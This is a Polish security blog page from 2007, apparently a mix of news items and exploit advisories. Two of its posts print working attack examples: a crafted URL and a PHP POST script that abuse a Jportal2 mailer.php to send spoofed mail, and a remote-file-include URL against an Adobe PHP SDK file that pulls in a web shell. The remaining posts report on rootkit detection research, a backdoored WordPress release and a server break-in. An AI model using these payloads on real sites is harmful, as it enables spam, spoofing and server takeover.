Komputery to nasza pasja ...

# Jportal2 wysyłanie maila na dowolny adres

v56r — Wed, 07 Mar 2007 19:32:25 +0000

Podatne wersje: Jportal2 z modułem mailer.php

Blad wystepuje w pliku mailer.php, ktory nie sprawdza czy adres e-mail podany w zmiennej $to jest na liscie e-mail’i portalu.
Najprostsza metoda wykorzystania jest spreparowanie adresu URL

http://adres.strony.com/mailer.php?to=adres@email.com&subject=TestExploita&

from_name=Admin&from_mail=admin@adres.com&body=TestExploita&ok=wyslij&cmd=sendmail

Takie proste wyexploitowanie jest mozliwe dzieki temu, ze Jportal nie sprawdza czy zmienna jest z tablicy POST czy GET.
Jesli, jednak ktorys admin pokusilby sie o dodanie sprawdzania czy zmienna jest z tablicy POST czy GET mozna dziure wykorzystac inna metoda

$fp = fsockopen(„adres.strony.com”,80,$errno,$errstr,1);
if(!$fp)die(„Nie mozna nawiazac polaczenia”);

$data = „to=adres@email.com&subject=TestExploita&from_name=Admin&from_mail=admin@adres.com&body=TestExploita&ok=wyslij&cmd=sendmail”;
$out = „POST /mailer.php HTTP/1.1\r\n”;

$out .= „Host: adres.strony.com\r\n”;
$out .= „Content-length: „.strlen($data).”\n”;
$out .= „Content-type: application/x-www-form-urlencoded\r\n”;
$out .= „Connection: Close\r\n\r\n”;

$out .= $data;
?>

# Rootkity – małe, wredne i trudne do usunięcia

v56r — Wed, 07 Mar 2007 15:37:23 +0000

Joanna Rutkowska, specjalistka ds. zabezpieczeń, zaprezentowała kilka różnych metod, za pomocą których wyspecjalizowane rootkity mogą oszukać nawet najlepsze dostępne obecnie mechanizmy obronne.

Rutkowska zaprezentowała wyniki swoich badań podczas poświęconej komputerowemu bezpieczeństwu konferencji Black Hat w Arlington, w stanie Virginia. Z jej prezentacji wynika, iż jeśli rootkit jest wystarczająco zaawansowany, aktualnie nie ma całkowicie skutecznej metody jego wykrycia w systemie.

Niektóre sprzętowe mechanizmy obrony przed rootkitami (m.in. takie produkty jak Tribble, CoPilot i RAM Capture Tool) działają w ten sposób, że wykonują „obraz” pamięci RAM (jest to najpewniejszy sposób na wykrycie obecności pewnych rodzajów rootkitów).

Rutkowska pokazała jednak trzy rodzaje ataków, skutecznie radzących sobie z tego typu zabezpieczeniami. Jeden z nich prowadził do zawieszenia komputera w momencie, gdy mechanizm zabezpieczający próbował uzyskać dostęp do stanu pamięci RAM, inny polegał na udostępnieniu do wglądu jedynie pewnej części pamięci. Ostatni typ ataku polegał na całkowitym maskowaniu rzeczywistego stanu pamięci fizycznej podczas jej skanowania. Druga z wymienionych technik w niektórych przypadkach pozwalałaby na odnalezienie śladów działania złośliwego oprogramowania w systemie, ale bez możliwości jego identyfikacji, zaś dzięki trzeciej oprogramowanie typu malware mogłoby nigdy nie zostać odnalezione.

Rutkowska twierdzi: „Żyjemy w XXI wieku, ale najwyraźniej nie potrafimy miarodajnie odczytać stanu pamięci naszych komputerów. Może powinniśmy pomyśleć o zmianie architektury systemów tak, aby można je było w pewien sposób zweryfikować”.

Źródło: PC World Komputer

# Java bezpieczniejsza niż C/C++

v56r — Wed, 07 Mar 2007 15:33:01 +0000

Projekty open-source’owe napisane w Javie zawierają mniej błędów niż aplikacje napisane w innych językach – wynika z badań przeprowadzonych przez firmę Fortify Software, zajmującą się audytem oprogramowania. Nie oznacza to jednak, że oprogramowanie pisane w Javie jest wolne od usterek – specjaliści z Fortify Software twierdzą, iż w zbadanych przez nich próbkach kodu napisanego w tym języku wciąż było sporo błędów.

Fortify Software opublikowała właśnie raport na temat błędów w open-source’owych aplikacjach, wykrytych w ramach prowadzone przez firmę oraz University of Maryland projektu Java Open Review. JOR monitoruje wiele projektów – jednak na potrzeby najnowszego raportu skupiono się na czterech – Hibernate, Spring, Struts oraz Tomcat. Okazało się, iż projekty te zawierają średnio 0,07 błędu na tysiąc linii kodu.

Jak mówią przedstawiciele Fortify Software, współczynnik ten jest o rząd wielkości niższy niż w przypadku podobnych projektów, pisanych w C i C++ – ale zastrzegają jednocześnie, że w i projektach „javowych” wciąż jest sporo do poprawienia. Liczne problemy wykryto m.in. w przykładowych fragmentach kodu oraz w interfejsach niektórych bilbliotek.

„Sposób, w jaki napisane są niektóre projekty, niejako zachęca programistów wykorzystujących ten kod, do popełniania błędów. Dostarczyliśmy dowód, że Java jest bezpieczna – teraz chcemy upewnić się, że open-source’owi developerzy potrafią naprawić błędy w swoich produktach, zanim staną się one zagrożeniem dla bezpieczeństwa użytkowników” – czytamy w oświadczeniu wydanym przez Fortify Software.

Warto zaznaczyć, że najczęściej wykrywanymi problemami w oprogramowaniu napisanym w Javie były błędy typu cross-site scripting.

Źródło: IDG, Fortify Softwar

# Atak na bloga

v56r — Wed, 07 Mar 2007 15:17:20 +0000

Użytkownicy, którzy pobrali system obsługi blogów WordPress w wersji 2.1.1, powinni niezwłocznie pobrać najnowszą edycję oznaczoną numerem 2.1.2.

Okazuje się, że serwer projektu został zaatakowany, a cyberprzestępcy podmienili wersję 2.1.1 spreparowanym przez siebie oprogramowaniem zawierającym tylne drzwi ułatwiające infiltrację kodu PHP.

Autorzy systemu nie podali szczegółów włamania na serwer, ujawnili jedynie o niebezpieczeństwie, jakie niesie za sobą instalacja WordPress 2.1.1.

Wersja 2.1.2, oprócz tego, że jest już bezpieczna, zawiera także kilka poprawek zwiększających wydajność oprogramowania.

źródło: heise-security.co.uk

# Atak na serwery Politechniki Koszalińskiej

v56r — Sun, 04 Mar 2007 19:18:47 +0000

Atak był skuteczny. Padły dwa serwery, w tym jeden o nazwie „LEW”. Skutki odczuli ludzie i instytucje w całym regionie. W koszalińskim ratuszu nie działa poczta elektroniczna, a strona internetowa miejskiej komendy policji jest zamknięta.

- Nasz serwer „LEW”, do którego podłączonych jest wiele instytucji, miał być potężny i chyba dlatego informatycy nazwali go mianem króla zwierząt – mówi prof. Tomasz Hesse, prorektor koszalińskiej uczelni.

Od soboty (24.02) jednak, gdy zaatakowali hakerzy, „LEW” nie działa. – Na szczęście informatycy byli w pracy. Spostrzegli włamanie do „LWA” i drugiego serwera, i od razu je wyłączyli. – Tylko nie piszcie, że to paraliż lub katastrofa. To zwykła awaria – przekonuje profesor. Na razie nie wiadomo, jakie szkody wyrządzili hakerzy, pokonując zabezpieczenia.

- Jedynym rozwiązaniem problemu było wyłączenie serwerów, co też Politechnika uczyniła. Atak musiał być dobrze przygotowany, bo trudno o lepiej zabezpieczone serwery, niż te na Politechnice – twierdzi informatyk z firmy dysponującej kilkudziesięcioma komputerami.

- Usunięcie awarii może trwać kilka godzin, a czasem kilka dni. Na szczęście dane są archiwizowane, więc wszystko wróci do normy – uspokaja. On też codziennie notuje co najmniej kilkaset prób włamania na firmowy serwer.

- Nie otrzymaliśmy zgłoszenia o włamaniu do serwera Politechniki ani o jakichkolwiek szkodach – twierdzi Beata Gliszczyńska, rzecznik koszalińskiej policji, która też padła ofiarą hakerów. Strona internetowa komendy nie działa.

- To nie jest dla nas wielki problem. Poczta działa, bo jest zainstalowana na serwerze Komendy Wojewódzkiej – tłumaczy. Z kolei Grzegorz Śliżewski, rzecznik ratusza, jest niepocieszony, bo ogromna część urzędowej korespondencji jest wysyłana mailem. – Trudno mówić o stratach materialnych, ale awaria zdezorganizowała pracę urzędu – przyznaje.

- Gdyby to był problem dla naszych odbiorców, to na pewno bym o tym wiedział. Ale nikt się do mnie nie zgłosił – bagatelizuje skutki awarii profesor Hesse. Nie potrafił nam jednak powiedzieć, jakie instytucje korzystają z usług informatycznych Politechniki. – Ostatnio podłączaliśmy sąd, policję i Urząd Miejski.

Rektor zapewniał, że w środę wieczorem, po pięciu dniach awarii, serwer ruszy.

Autor: Cezary Sołowij
źródło: Głos Koszaliński

# Adobe php sdk Remote File Include Vulnerabilities

v56r — Thu, 01 Mar 2007 18:59:32 +0000

Poziom Ataku: Bardzo Krytyczny
Typ Ataku : Zdalny
Autor: Crackers_Child
Kontakt: crackers_child (at) sibersavascilar (dot) com

Błąd występuje w pliku CachedGateway.php:

include_once("app/Gateway.ph p"); include_once(AMFPHP_BASE . "custom/CachedExecutionAction.php");

Kod nadużycia:

www.atakowana.strona.pl/adobe_php_sdk_path/librar ies/amfphp/amf-core/custom/CachedG ateway.php?AMFPHP_BASE=sh3ll?_